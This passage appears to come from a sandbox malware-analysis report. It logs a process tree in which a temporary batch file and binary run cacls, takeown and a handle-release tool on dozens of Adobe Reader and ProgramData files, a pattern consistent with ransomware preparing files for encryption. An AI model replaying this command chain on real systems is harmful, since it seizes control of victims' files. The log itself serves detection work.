C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:980
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:2008
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "directories.acrodata" -nobanner3⤵PID:1952
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "directories.acrodata" -nobanner4⤵PID:392
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:2012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵
- Modifies file permissions
PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "behavior.xml" -nobanner3⤵PID:664
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "behavior.xml" -nobanner4⤵PID:520
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:928
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1124
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:1152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:392
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:892
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:1928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵
- Modifies file permissions
PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:1456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "create_form.gif" -nobanner3⤵PID:828
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "create_form.gif" -nobanner4⤵PID:1556
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵
- Modifies file permissions
PID:960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "info.gif" -nobanner3⤵PID:772
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "info.gif" -nobanner4⤵PID:1736
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:1592
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:1908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:1188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "trash.gif" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "trash.gif" -nobanner4⤵PID:800
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:1932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:1620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:1924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:804
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:1824
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:1724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵
- Modifies file permissions
PID:1636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "can.hyp" -nobanner3⤵PID:1932
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "can.hyp" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:1712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "usa37.hyp" -nobanner3⤵PID:1060
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "usa37.hyp" -nobanner4⤵PID:1924
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵
- Modifies file permissions
PID:1968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:768
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵
- Modifies file permissions
PID:240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:1724
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:1636
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "behavior.xml" -nobanner3⤵PID:432
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "behavior.xml" -nobanner4⤵PID:520
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:2012
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1968
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1124
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1188
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:1592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:1652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:240
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:1648
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:1908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "overlay.png" -nobanner3⤵PID:928
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "overlay.png" -nobanner4⤵PID:1004
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:1552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1400
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:392
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:1560
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:1652
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵
- Modifies file permissions
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "email_all.gif" -nobanner3⤵PID:1648
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "email_all.gif" -nobanner4⤵PID:1220
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:1924
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵
- Modifies file permissions
PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:1552
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:392
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "rss.gif" -nobanner3⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "rss.gif" -nobanner4⤵PID:1456
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:1652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:2012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:1220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:1156
-
-
